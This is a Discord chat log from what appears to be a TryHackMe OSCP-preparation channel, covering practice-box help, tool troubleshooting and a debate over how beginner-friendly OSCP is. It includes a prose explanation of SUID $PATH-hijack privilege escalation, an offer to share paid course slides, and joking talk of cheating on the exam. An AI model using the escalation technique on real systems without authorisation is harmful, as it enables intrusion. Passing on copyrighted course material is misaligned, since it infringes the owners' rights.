#

also configSubmit is taking too long

wraith echo
#

Guys, I need a tip regarding lord of the root box

#

Should sqlmap provide me with some information or spit up garbage?

#

Because I cannot use it to exploit login form

wraith echo
#

Additionally - don't you think, boxes in OSCP Prep Learning Path should be prepared without need of sqlmap? It is banned on OSCP itself

bronze zenith
#

there are multiple rooms which use sqlmap (example: CC Pentesting), but as i remember, there are rooms coming up about sqli

final vault
#

@wraith echo I'm pretty sure this has been acknowledged before and is something that is being worked on

wraith echo
#

Oh, okay

#

good to know

#

@bronze zenith I know

final vault
#

It's also a choice to use sqlmap

#

for in oscp there are plenty of rooms which are vulnerable to metasploit modules. But it's down to the user to know how to manually exploit it or adapt a normal script to exploit

wraith echo
#

@final vault It is not in this case. I know that you can do everything manually, but in case of time based sqli it is not plausible for user to do this manually.

#

Thats why if there is some SQLi on OSCP, it is relatively easy one

#

So I think, that should be the path of THM OSCP Labs

final vault
#

@spark iron @hasty sentinel Probably the best two to see this. Some nice feedback on the oscp path

hasty sentinel
#

yeah good note :))

#

I'm in the process of updating the path

#

We're going to update boxes to include walkthroughs without metasploit

#

We'll look into adding a SQL injection box :))

thorn patio
#

hi team .what badge i can get aafter finishing the Begineer path

bronze zenith
#

you get badges for completing rooms

#

see the list here

thorn patio
#

k

obtuse scaffold
#

If you want to learn about manual SQLi you can either use proxy on sqlmap to study the requests in burp or go through the portswigger exercises on their website

buoyant mica
#

Any one can guide me on hackpark ? hydra is taking forever

sly fable
#

I cannot connect to any machine. I am using the VPN connection, I deployed the machine, yet I cannot ping or access any machine. I tried Hackpark and Steel Mountain

spark iron
#

Are you defo connected?

fleet wedge
#

howdy

chrome valve
#

Hackpark and Steel Mountain are both windows boxes. You won't be able to ping them, or use nmap without -Pn @sly fable

fleet wedge
#

can someone please PM me and double check my john the ripper syntax for a password cracking task?

#

I'm 99.9% sure is correct, but not working for the password cracking task for Blue

sly fable
#

Hackpark and Steel Mountain are both windows boxes. You won't be able to ping them, or use nmap without -Pn @sly fable
@chrome valve Yesterday I was able to access the website on Hackpark server. Today I cannot

chrome valve
#

Sounds like a VPN problem then. Try ps aux | grep openvpn

#

If there's more than one connection then you have a problem.

drowsy kelp
#

hi can anyone please confirm where to purchase the pro voucher

spark iron
toxic temple
#

As a rule of thumb if you don't get an answer immediately don't then send the same question in every channel until you do

#

That's literally spam

digital sonnet
#

Hey everyone, my hashcat seems to be working really slow. I am running it on a 1050Ti but my gpu shows only 1-2% usage. What could be the problem?

obtuse scaffold
#

dont think it works from gpu automatically

#

should work through rockyou in like 40 seconds tho

digital sonnet
#

I am running it on my windows machine, it's really slow like 0.1% done in a 10 mins

final vault
#

@digital sonnet if you’re using a vm it won’t go near gpu

digital sonnet
#

and I have selected my gpu

fleet wedge
#

Go it now... Thanks @obtuse scaffold

sly fable
#

If there's more than one connection then you have a problem.
@chrome valve Worked after killing openvpn
pkill openvpn

chrome valve
#

That'd do it

fleet wedge
#

Question ... on Kenobi, task#2 ... is it asking for distinct open ports? or the sum of UDP plus TCP open ports? blobhuh

#

can someone please clarify?

clever badger
#

Its all the UDP ports + all the TCP ports added together

fleet wedge
#

I am sorry, but I think Kenobi, task#2, is wrong or the answer is not properly formulated

#

I do not agree with the proposed answer, and I've spent quite some time researching because I thought I was wrong, but I am not

simple kestrel
#

@fleet wedge check out my last twitch.tv video

#

That might help

slim gust
#

For Windows machine, where is root flag locate at ?

thorn patio
#

Hi guys need a help in Hackpark, to escalate privelege , now i am having a MSF SHell

fleet wedge
#

@simple kestrel hi... help with ?

simple kestrel
#

Yea on?

#

Pm

fleet wedge
#

You mean , the issue with nmap answer ? For kenobi?

#

I’m positive answer is wrong

#

there are more open ports on that box.

simple kestrel
#

Yea let's chat in PM to not spoil

thorn patio
#

it

thorn patio
#

anybody there !!!!!!!1

hard shoal
#

How have you rooted the box if you cant answer what binary you should exploit ?

thorn patio
#

i have used the windwos-exploit suggester

#

and it gaves me a priv esc with metapsploit module , so i have dont that

hard shoal
#

Ok cool I don't think that the intended way but owning the box is owning the box.

thorn patio
#

yes @hard shoal

#

but i need only for question 4

#

i have founded the question 3

hard shoal
#

Look at the hint as that helped me because its not the program you think it is.

thorn patio
#

h athats annoying

#

thats*

#

to open the event log

hard shoal
#

I think I connect via RDP as made slight easier to review stuff.

thorn patio
#

yes thanks boss

#

hey cant connect

#

to rdp

fleet wedge
#

I think I connect via RDP as made slight easier to review stuff.
@hard shoal Do you mind editing your post and remove the initial part? to keep the fun for others and avoid spoilers πŸ˜‰

#

better to PM people directly next time, and discuss details about a room that way, my 2 cents

hard shoal
#

Has anyone done brainstorm here ? Im stuck and not really sure why what I am doing is not working.

fleet wedge
#

what's relationship between that SUID file in kenobi and /bin/sh and curl? I do not understand why we had to copy that to gain root, or why I ended getting root, if I never touched the SUID file. Can someone please explain that to me?

alpine peak
#

@fleet wedge SUID on a binary means when ran, it takes on the permission of the owner of the binary, when a binary is calling another file without an absolute path, it uses the $PATH variable to find that file, and that allows you to trick the SUID binary to call your own fake curl thats located in the $PATH before the real curl. so the result is you can run your own file as root.

#

The attack would not be possible if it called an absolute path since the PATH variable would not be needed

fleet wedge
#

Thanks . It’s just that it is not so clear in the explanation / question, that you have to inspect that file’s content in order to modify the β€œfake” curl

#

There’s an image but nothing tells you where the image came from , it’s confusing , at least to me

#

I spend like 1 hr reading and re reading till finally got it

alpine peak
#

if you use strings you can see its calling curl without an absolute path

fleet wedge
#

Not the exercise , but where the image came from

#

@alpine peak Yes but it doesn’t tell against WHAT you have to run string to

alpine peak
#

you use the find command to search system wide for SUID

chrome valve
#

The only file that you've been looking at for the task @fleet wedge
Why would it suddenly change focus?

fleet wedge
#

Maybe I’m not explaining myself properly

#

The question is not clear

chrome valve
#

In the first question of that task it asked you to find a file, which you presumably did

#

Yes?

fleet wedge
#

Correct

alpine peak
#

I didn't write the questions, I just know what the machine contains

chrome valve
#

Well, given you already found the file, why would the questions suddenly be about a different one?

#

It's the context of the task

fleet wedge
#

What suid does , what it is , etc , that’s clear

#

Because it doesn’t explain the attack vector and related to the image

#

I would have elaborate more in the explanation about what’s that image coming from

chrome valve
#

That would be this paragraph here

fleet wedge
#

I am mobile now so can’t check

chrome valve
#

That paragraph is explaining how the attack works

alpine peak
#

yea, it doesn't have to be /bin/sh but I don't see the problem

chrome valve
#

However, I think that there might be a mistake there

#

@alpine peak, am I being stupid, or should the last sentence say /bin/sh, not /usr/bin?

alpine peak
#

yea, that's a typo

chrome valve
#

I'll throw it over in bugs

fleet wedge
#

Thanks

chrome valve
#

The typo

#

I'm still not convinced there's a problem with the question

#

Although I'll ask for it to be reviewed as well

fleet wedge
#

Well, I would rephrase the question but can’t elaborate more Until I get home

alpine peak
#

@spark iron typo in question on Kenobi

#

He will see the chat and fix it

rare dock
#

Guys I have a question. Lets say I know some basic XSS exploitation, WAF evasion, SQLi etc. I know more about web pentesting and I am very very interested in learning some linux/windows pentesting as well. Is getting the subscription and enrolling in paths a good idea to "learn" in your opinion? Or should I stick to books and hackthebox?

chrome valve
#

Just posted that in #site-bugs as well. It's the same question, if you read this Skidy

alpine peak
#

PWK by Offensive Security is the best, cert based training

rare dock
#

PWK by Offensive Security is the best
@alpine peak For learning? Or for getting certified?

alpine peak
#

Learning

chrome valve
#

Yes, it's worth it though. PWK will teach you the most, but the THM stuff is really good too

alpine peak
#

well both

chrome valve
#

Good affordable option certainly

alpine peak
#

PWK is a lab env

regal lark
#

THM?

fleet wedge
#

@rare dock for leaning ? This site and VHL

regal lark
#

haha this chan

rare dock
#

Well PWK is a bit pricier than THM, so ill grab it for now, and PWK will come next. How do you guys like eLearnSecurity courses?

#

I have slides for Penetration Testing Professional

#

very nice, indepth info

#

I can share if ya want

alpine peak
#

THM is working on implementing full networks for pentesting training

fleet wedge
#

OffSec material (old at least ) is not good enough in my opinion

alpine peak
#

Its new

rare dock
#

PWK got an update if I recon correctly

#

so its hot af rn

fleet wedge
#

ELearning courses is great too, but this learning path is good so far , I like it

alpine peak
#

Yea, offsec knows what they're talking about when it comes to this subject, which is why I recommended them for training

rare dock
#

Okay. Thank you very much guys! πŸ™‚

fleet wedge
#

@alpine peak i respectfully disagree . The cert is very good but it’s teaching material and methods , not so much

alpine peak
#

Why?

#

Have you done their course?

fleet wedge
#

Yes

#

That’s why I’m talking about

alpine peak
#

I did it also

#

The US government seems to agree with their course for training also

fleet wedge
#

Compared to tryhackme and VHL, and eLearning their training material lacks

alpine peak
#

They expect you to research on your own, hint the "Try Harder" motto

fleet wedge
#

They β€œthrow you to the pool” so you can swim

#

Bad teaching method

alpine peak
#

Depends

fleet wedge
#

Again, not talking about the cert

#

I respect the cert itself but that’s probably a conversion for another chat / room

alpine peak
#

They don't claim PWK is a beginner level course

fleet wedge
#

And doesn’t have to be

alpine peak
#

If you want your hand held, I would recommend something else

fleet wedge
#

β€œHand held” and proper training is not the same

#

The β€œtry harder” method is most of the time people telling you ... try again

#

With no explanation whatsoever

alpine peak
#

Try Harder is proper training because the whole idea of hacking is to be in ignorance about the machine you're attacking

#

When you get into the industry, who is going to give you answers?

fleet wedge
#

You can learn with proper guidance

#

You will always have someone or something you can rely on

#

But again, this topics is not for this room

alpine peak
#

Someone who actually can "Try Harder" you are correct

fleet wedge
#

No, a proper mentor

#

Someone who can guide you without spoiling the learning process

spark iron
#

@alpine peak, am I being stupid, or should the last sentence say /bin/sh, not /usr/bin?
Thanks Fixed:)

alpine peak
#

Its good to have a guide if you're a beginner, but once you get into it, you need have highly developed enumeration skills for when blackbox pentesting happens. Getting answers creates a bad habit in my opinion, of giving up on something you can't figure out and you won't always have someone to give you those answers

fleet wedge
#

OSCP is a beginner / foundational course . That’s how is being marketed by OffSec

alpine peak
#

Its a buzz word

fleet wedge
#

You keep pairing the concept β€œgiving answers” with β€œproper training”, they are not the same .

alpine peak
#

Pentesting is not a beginner level field

fleet wedge
#

The best example , again, this site , virtual hacking labs

#

If you haven’t seen it, enroll , or eLearning , then you may understand what I’m saying

alpine peak
#

There is a difference between real life and CTF machines, The OSCP path was developed from offsec

#

You can't give credit to the OSCP path without giving credit to PWK

fleet wedge
#

I will go beyond , if PTP was much more popular , I can assure you people would be pursuing that one instead

#

And the main reason why OffSec copies and updated their material this year , which has been already done by eLearning

#

As an A+ β€œHR filter”, OSCP excels

alpine peak
#

It excels literally because of "Try Harder"

fleet wedge
#

My opinion is that PTP is way better

#

@alpine peak you know ? Whatever man

#

Gotta go, let’s agree to disagree

alpine peak
#

Yea, the ideals are just different, I just believe "Try Harder" because it worked for me

fleet wedge
#

@alpine peak and that’s a valid point

alpine peak
#

I hated the motto "Try Harder" when I was doing it because I was stressed all the time, but in hindsight, I agree with it

simple kestrel
#

@alpine peak oscp is a beginner level training and cert. I agree with @fleet wedge try harder is not a training method. Concepts need to be explained and demonstrated. Training is meant to fill gaps and just saying a phase does not help fill that gap.

chrome valve
#

@simple kestrel the most important skill in hacking is research. You need to be able to learn for yourself -- look things up. Teach yourself.
Nothing good comes from being spoon fed. Not past the training wheels anyway, and OSCP makes no claim to be an introductory certification.

#

Try Harder is very much a training methodology, and it's the mindset that we all need to adopt if we're going to get anywhere in the real world

simple kestrel
#

They literally say those new to infosec or pentesting should start here

#

Try harder is crap. I agree that a pentesters should be able to research. But if you have a training class telling some one to try harder is not a training method. It is a gap in your training.

#

If it was an advance class or training then yes I could see that.

final vault
#

oscp is like a medium rated beginner cert

simple kestrel
#

Or something like we taught you reflective xss figure out how to do stored

final vault
#

Most pentesters claim it to be easy but you still need a basic knowledge to finish it. Just raw dogging pwk won't be enough

simple kestrel
#

It not it says intro to infosec. Go look at the site

chrome valve
#

It's foundational for penetration testing -- literally one of the most advanced fields in computer science. I quote here, it's for "those seeking a step up in their skills and career".
That's not to say that it's necessarily hard, but it's also not designed for complete beginners

#

It's designed to train you how to think, and how to use the tools on offer

#

It's not there to hold your hand

simple kestrel
#

Foundation

chrome valve
#

Notice that it's not a foundation for Linux. It's not a foundation for computer science. It's not a foundation for basic concepts

#

It's a foundation for penetration testing

#

You can't do pentesting unless you're already pretty damn good with computers -- that's literally the original definition of a "hacker": someone good enough to make computers do stuff they ain't meant to do

final vault
#

unfortunately pentesting isn't a competency that a regular cs student will know without exposure. It requires dedication

signal pumice
#

I'm on the kenobi box but there is no SSH key in the /tmp directory?

chrome valve
#

Exactly that ^^

simple kestrel
#

I agree @final vault but if you are teaching a foundation class then you need to teach all the concepts.

final vault
#

Man I can't justify it anymore than I or muirland has.

chrome valve
#

@signal pumice pretty sure you need to move it there yourself

final vault
#

just because it's foundation doesn't make it easy

signal pumice
#

I'm a fucking idiot, cheers

final vault
#

I'm sure the foundations of nuclear fusion isn't easy

chrome valve
#

Good way to look at it

simple kestrel
#

No

chrome valve
#

You can't have a foundation to an advanced topic without building on prior knowledge

simple kestrel
#

You had to learn about atoms in order to do nuclear fusion

chrome valve
#

You've gotta learn a lot more than that...

simple kestrel
#

That what I am saying

chrome valve
#

Oh good, so we're agreed? A foundation for an advanced topic needs prior knowledge?

signal pumice
#

Read only FS πŸ€”

final vault
#

Yes, and you have to learn about networking fundamentals, software dev and an understanding of at least every part of CS to do pentesting

simple kestrel
#

Again everyone opinion different on this.

final vault
#

So again they can't tailor a course to spoon feed that

chrome valve
#

No. That isn't an opinion, mate.
That's a fact of life

simple kestrel
#

Have a training class means that you are training people. And that includes concepts. If people are complaining then you have gaps in your training

chrome valve
#

Pentesting is built on top of everything

#

It's literally based on a mastery of computer science

#

hence the salaries

final vault
#

At the end of the day this isn't school anymore, pentesting is something we have all chosen to pursue, whether for fun to participate in CTFs or to do it as a career. No one forces you to learn however it is a choice to push yourself to succeed

#

No one in life will give you 100% coverage on everything. PWK is known to give a decent understanding of what is expected, however there will be gaps. Those you should know you have to find out yourself and push to understand them

#

You might struggle with how the material covers those topics. Well bad news time to find another source and try understand it

chrome valve
#

And that's the important thing. Pushing yourself. No one is going to be around to hold your hand forever. Research is the most important skill we'll ever learn -- especially for pentesting: a job that literally requires you to know more than you can ever possibly know straight off

final vault
#

thank you for coming to our ted talk skidy

chrome valve
#

That ^^

simple kestrel
#

W/e . It is a matter of opinion.

chrome valve
#

Not really, but sure πŸ€·β€β™‚οΈ

fleet wedge
#

You can never give up, you can never surrender, fight the good fight til the end of the night and always rememeber

final vault
#

Unless you're @jovial pawn, then surrender is in your DNA ❀️

#

love you Horse

fleet wedge
#

πŸ˜‚ πŸ˜‚ πŸ˜‚ πŸ˜‚ πŸ˜‚

jovial pawn
#

I am speechless

toxic temple
#

🏳️

#

con comme une valise sans poignΓ©e

alpine peak
spark iron
#

what

#

the

#

hell

#

Is that for you?

alpine peak
#

^ So, Nope its not beginner level according to offsec

spark iron
#

Weird.

final vault
#

^

alpine peak
#

I told offsec, I had no experience and they send that to people

spark iron
#

Ah sheeiittt

#

Weird, oh well. bad advertising on their behalf.

alpine peak
#

Everyone is acting like PWK is beginner level just because they saw it online somewhere, but offsec saids its not

#

tryhackme is actually beginner level

final vault
#

^^ It requires a fairly decent knowledge level and the site says that when you go to sign up for the course

#

If I remember reading it correctly last week when I signed up

alpine peak
#

I always disagreed with people saying PWK is beginner level, because they literally just expect you to know from the start

toxic temple
#

they say it's entry level for their ecosystem iirc, not beginner level

alpine peak
#

Well they used the word entry level and said PWK is not that so?

chrome valve
#

@simple kestrel -- for the record, that is the official response from offsec ^^

#

Wait for a response to that. It might be necessary...

final vault
#

^

#

So what you're saying is I need to bribe g0tmi1k and Owen when I sit my exam

#

gotcha

toxic temple
#

nah TJ kekw

#

ye @final vault

final vault
#

oof

alpine peak
#

They won't take bribes

final vault
#

tbh I gotta spend some serious time on windows

toxic temple
alpine peak
#

The company has a pretty large legal dept, so you might get sued for even trying

final vault
#

I was joking πŸ˜‚ but hey

#

Man hasn't got the money to bribe

#

if I did I'd just hire an Indian guy on fiver

alpine peak
#

Mentioning the OSCP exam is sketchy to me, because cheating is considered 1st degree murder to them

spark iron
#

^ I think thats were they earn most of their money

#

So its threating their livelihood if the certs rep gets damaged.

alpine peak
#

they will literally sue you for a lot of money

toxic temple
#

OSWP isn't even proctored kekw

alpine peak
#

No one really cares about that cert anyway

crimson flame
#

OSWP was pretty fun tbh

toxic temple
#

just because you speedran it

crimson flame
#

only bc OffSec had some issues getting it setup kekw

#

and because the challenges department got back to me 30 minutes into the real start of my exam

final vault
#

πŸ˜‚πŸ˜‚ tbh you did speed run it

crimson flame
#

listen

final vault
#

Discord chat. Oh there’s one flag, there’s two, there’s 3. Done

crimson flame
#

1:30 is pretty impressive time

#

although it could be done faster

alpine peak
#

Amazon certs are worth a lot of money now

crimson flame
#

Cloud is worth a lot of money in general

#

Azure is becoming a pretty big thing

alpine peak
#

Primary AWS and Azure

#

Azure just got into the market way to late and AWS took it

crimson flame
#

I've heard a lot more conversations surrounding Azure as of late though

alpine peak
#

AWS is 30% of the market and Azure is 16%

#

AWS is still way larger according to the market

crimson flame
#

i think cloud is one of the things that needs a lot more exposure in terms of testing

alpine peak
#

The security is often the job of the DevOps engineer

crimson flame
#

and that explains why there's a security concern of the cloud HYPERLUL

alpine peak
#

Depends

#

That's why avarage salary is up to 100,000/year because its hard to find experts with cloud

crimson flame
#

fair point

alpine peak
#

Linux Academy is profiting from this

fleet wedge
#

I love Linux Academy. Another great platform. I passed one of the AWS certs with flying colors just using that

#

Very hands on and quality material and teachers

alpine peak
#

I agree, I passed the LPIC1 because of them

digital sonnet
#

Hey can I pm anyone for help with skynet? the exploit is not working properly

hidden rivet
#

You can DM me if you’d like. On phone though so you’ll probably have to send pics to refresh my memory

safe elm
#

Hello everyone, I haven't enrolled yet to any paths but can someone tell me how does the learning path looks like? if that's okay

bronze zenith
#

learning path is basically a collection of rooms placed in a strict order so it would give you a right path of learning (so you wouldn't start with harder rooms or wouldn't feel lost)

safe elm
#

@bronze zenith thanks for reply, that sounds nice. is it only texts or some video explanation

#

and thanks again for help

#

brb

bronze zenith
#

path is rooms (which obviously have text walkthroughs (now even videos))

rotund carbon
#

hey

rotund carbon
#

hey could i pm anyone for help with 1 step of the hackpark

fleet wedge
#

@rotund carbon hi

#

I’m currently working on that one but feel free to PM me

fathom rapids
#

After 2 days I m not able to escalate skynet. Never doing the same things on walkthrough

#

Any help?

digital sonnet
#

dude just completed skynet after 12 hours going crazy

#

hmu for help

lyric tendon
#

I'm on the HackParck Question 4 of Task 4: I used run event_manager.rb -l system but not sure for what I am looking and nothing is standing out

thorn patio
#

yes same for me , i need the help on that only @rotund carbon

hard shoal
#

I attempted my OSCP exam yesterday and it didn’t go too well. Im just not sure where to go from here.

autumn field
#

I'm pretty sure, with a bit more experience you'll make it πŸ™‚

hoary hazel
#

guys is this the right place to ask for help re the OSCP-PATH and the vulnversity room?

fleet wedge
#

@hard shoal take a week break , and use tryhackme VIP and virtualhackinglab. Don’t despair , it’s an easy test

#

@hoary hazel Yep it is . I did vulnersity, I can guide you with it . PM me if you want

hard shoal
#

I done most of The OSCP path on here. I don’t know if I was overthinking stuff or what happen. I just flopped big time.

bronze zenith
#

No one can guaranteer that OSCP will give you enough knowledge to pass the oscp exam

#

it is a great way to expand you knowledge

hard shoal
#

Yeh for sure Im just not sure where to go from here. As I dont know if I missed stuff or I was trying the right thing in the wrong way.

fleet wedge
#

Establish a process, I think that’s important. And you can extrapolate later

#

Besides tryhackme, I like HTB VIP. Have you being there ?

hard shoal
#

I had a process just nothing worked as I expected lol was not sure if I was over thinking stuff or just missing really obvious stuff. No I have not done HTB but have watch the recommended video from IPPsec on the OSCP path.

fleet wedge
#

I like HTB VIP. I will recommend you the retired boxes

#

I’ve also enjoyed OSCP path here . Some machines may be too easy for you, but it’s a nice refresher .

hard shoal
#

Sure thanks I just don't know where I need to improve. I think my Enum was fine but everything I tried didnt work so either I was overthinking stuff or missing something.

fleet wedge
#

We also have a nice discord channel, I’m part of it. With few people who had passed OSCP already

lilac frost
#

hello

#

I enrolled yesterday but I cannot find any videos of tutorial or so

#

All I see is questions

#

Pls where can I find tuts

spark iron
#

@lilac frost not all rooms have videos yet:)

lilac frost
#

The first room did not have videos

spark iron
#

Blue and nmap have videos, there are 2 more coming in the next day or so.

lilac frost
#

I am a complete beginner

spark iron
#

okai, I would say wait 24 hours - there is a beginner room that is going to include a video

#

Will help you a lot.

#

In the mean time I'd suggest doing a Linux room

lilac frost
#

aii thanks

alpine peak
#

darkstar does have a good voice for it

spark iron
#

@topaz yoke Now you see why:)

alpine peak
#

better than my redneck voice πŸ™‚

spark iron
#

Never heard you speak I dont think

#

I dont think heard me either

alpine peak
#

Yes you have

#

I have

spark iron
#

o rly?

fleet wedge
#

Mi mi mi mi mi mi

alpine peak
#

You interviewed me because I made machines for vulnhub

spark iron
#

ohhhhh yeaaahhhh

#

That was such a long time ago

#

Well it feels it

alpine peak
#

You're very british, that's what I remember

spark iron
#

Aha, I don't sound my age is all I know.

#

But thanks? I think